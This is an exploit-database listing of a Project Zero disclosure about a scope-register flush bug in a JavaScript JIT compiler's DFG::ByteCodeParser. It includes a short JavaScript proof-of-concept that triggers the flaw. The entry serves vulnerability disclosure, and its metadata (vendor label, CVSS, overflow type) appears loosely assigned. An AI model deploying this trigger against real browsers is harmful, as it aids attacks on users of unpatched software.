header-logo
Suggest Exploit
vendor:
Chromium
by:
Project Zero
9,8
CVSS
HIGH
Stack Buffer Overflow
119
CWE
Product Name: Chromium
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

DFG::ByteCodeParser::flush() Vulnerability

At (a), it should flush the scope register of inlineStackEntry->m_codeBlock instead of m_codeBlock. But it doesn't. As a result, the scope register of inlineStackEntry->m_codeBlock may have an incorrect offset in the stack layout phase. The proof-of-concept code provided throws an exception to trigger the vulnerability.

Mitigation:

Update to the latest version of the software.
Source

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1234

Here's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).

void flush(InlineStackEntry* inlineStackEntry)
{
	...
    if (m_graph.needsScopeRegister())
        flush(m_codeBlock->scopeRegister()); <<--- (a)
}

At (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.

PoC:
-->

function f() {
    (function () {
    	eval('1');
    	f();
    }());

    throw 1;
}

f();